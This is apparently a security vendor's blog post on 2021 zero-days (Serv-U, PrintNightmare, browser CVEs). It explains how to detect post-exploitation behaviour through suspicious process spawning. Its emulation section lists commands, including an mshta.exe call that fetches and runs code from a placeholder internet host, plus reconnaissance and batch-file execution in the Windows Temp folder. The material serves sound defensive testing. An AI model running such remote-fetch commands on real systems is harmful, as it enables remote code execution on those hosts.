You can’t detect 0-day exploits but… you can detect what happens next

TLDR:

One of the best-known ways to gain access into an organization and avoid detection is by way of a zero day. This term is used to describe vulnerabilities that vendors and users are unaware of. Though a zero day can’t be detected, the aftermath will reveal itself on the affected system. In this piece, we have provided ways to utilize the SCYTHE adversary emulation platform to detect and respond to malicious behaviors. SolarWinds, Serv-U, Google Chrome and a few other recent zero-day attack procedures are covered. Commonalities between each of these attacks are explained as well as a guide for attack emulation and executables for detection and response.

A zero day (or 0-day) is a vulnerability that is not known by the software vendor nor the end users. They are a great way to gain initial access into an organization without being detected. Zero days are rarely used in widespread attacks as they are a high cost to the attacker (identifying a vulnerability that has a high chance of successful exploitation). Zero days can be sold and purchased by governments or malicious actors when they are not disclosed to the affected vendor. The problem with zero days is that there are no detections, however, we argue that what can be detected is what happens after the zero day exploits a system.

In this blog post we look at some of the recent (July 2021) 0-day attacks targeting SolarWinds Serv-U, Microsoft Print Spooler (PrintNightmare), Google Chrome, and others. What occurs after successful exploitation and how can you detect the unknown? Our focus on assumed breach gives you plenty of behaviors you can actively detect and respond to by using the SCYTHE adversary emulation platform.

SolarWinds Serv-U 0-day

Microsoft Threat Intelligence Center (MSTIC) released a report on July 13, 2021 that SolarWinds Serv-U software was being exploited by a 0-day exploit. The vulnerability was CVE-2021-35211 and recently patched by SolarWinds. The threat group taking advantage of this vulnerability is DEV-0322, operating out of China, according to MSTIC. SCYTHE built and shared an adversary emulation plan for DEV-0322 based on the Cyber Threat Intelligence provided by Microsoft. If you are running SolarWinds Serv-U, patch vulnerable instances and head over to the detect and response section of this blog post to detect the exploitation of future 0-days.

0-days in Web Browsers

Google’s Threat Analysis Group (TAG) reported 4 0-day vulnerabilities on various web browsers on July 14, 2021 that were being actively exploited in the wild by various threat actors:

• CVE-2021-21166 and CVE-2021-30551 in Google Chrome
• CVE-2021-33742 in Microsoft Internet Explorer and
• CVE-2021-1879 in Apple Safari/WebKit
  

The folks at Google make a good point in their blog that the number of 0-days being detected does not necessarily mean there are more 0-days; instead, that we are detecting more 0-days used in the wild. That may be because of an increase in detection and disclosure which is a good thing. We want threat actors to have to spend more resources to obtain 0-days than to leverage methods that can be patched.

Print Nightmare 0-day in Windows Print Spooler

Microsoft has released multiple CVEs for vulnerabilities known as Print Nightmare. The Windows Print Spooler is a service that runs by default on all systems. As the name suggests, it allows you to print. In most organizations, you have a print server that allows endpoints to connect, install the print driver, and print. In the past month, the printer spooler service has been under review due to various vulnerabilities:

• CVE-2021-1675
• CVE-2021-34527
  

Essentially, a malicious actor with low privilege can remotely install a print driver which runs with SYSTEM privileges. This vulnerability is a little more complex to fix than just installing the patch. Head over the Microsoft Security Response Center for more information. 

What do all these 0-days have in common?

Apart from the inherent issue that these are all 0-days and neither vendors nor end users knew about the vulnerability or exploit, all of these 0-days leverage the exploited process to spawn other processes. This gives the blue team a great opportunity to detect exploits or other behaviors that leverage this technique. By monitoring the processes that are spawned from other processes, it allows for the identification of processes that should not be starting. For example, if you see Microsoft Word running powershell.exe, that is probably malicious activity. Head to detect and respond section for more.

Attack Emulation

While there are multiple exploits available for these 0-days, you don’t have to exploit any process to emulate the technique you want to detect: a process spawning another process. Exploitation, by design, is risky and may crash a service or an entire system. As we build detections, testing in non-production is ideal. However, once the detections are in production, we should test to ensure our people, process, and technology is working as assumed.

SCYTHE built and shared an adversary emulation plan for DEV-0322. Follow the steps in the plan and rename the SCYTHE client from the default of ServiceLogin to Serv-U.exe. When this process runs, it will spawn processes and emulate the behaviors seen in the DEV-0322 attack. 

We also want to share how to do this manually for anyone not using SCYTHE:

Open a command prompt and run these commands:

• C:\Windows\System32\mshta.exe http://<An Internet IP>
• cmd.exe /c whoami > whoami.txt cmd.exe /c dir > dir.txt
• cmd.exe /c echo whoami > C:\Windows\Temp\Serv-U.bat
• cmd.exe /c "C:\Windows\Temp\Serv-U.bat"
• powershell.exe "C:\Windows\Temp\Serv-U.bat"

Detect & Respond

Our focus in detection should be on what happens after the exploit. For a 0-day, neither the vendor nor you will know about the vulnerabilities until they are detected in another attack. Do not wait for that. You can build detections of the behaviors that occur after exploitation. As there were multiple 0-days explained in this post, we will cover the detections holistically. Shout out to our friends at Splunk that had a great post on detecting PrintNightmare.

• An executable spawning mshta.exe
• An executable spawning cmd.exe
• An executable spawning powershell.exe
• An executable spawning rundll32.exe
• An executable spawning whoami
• An executable spawning dir
• mshta.exe reaching out to the internet

Conclusion

Zero days by definition are difficult to detect as the vulnerability is not known by the vendor nor the end users. Therefore, focus on detecting and responding to what occurs after the successful exploit. In this post we cover multiple 0-days that were released in the last month, understand how they were used by threat actors, and emulate the behaviors so that we can detect and respond to them. If you are interested in trying out SCYTHE for Attack, Detect, and Response, let us know. 

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.

‍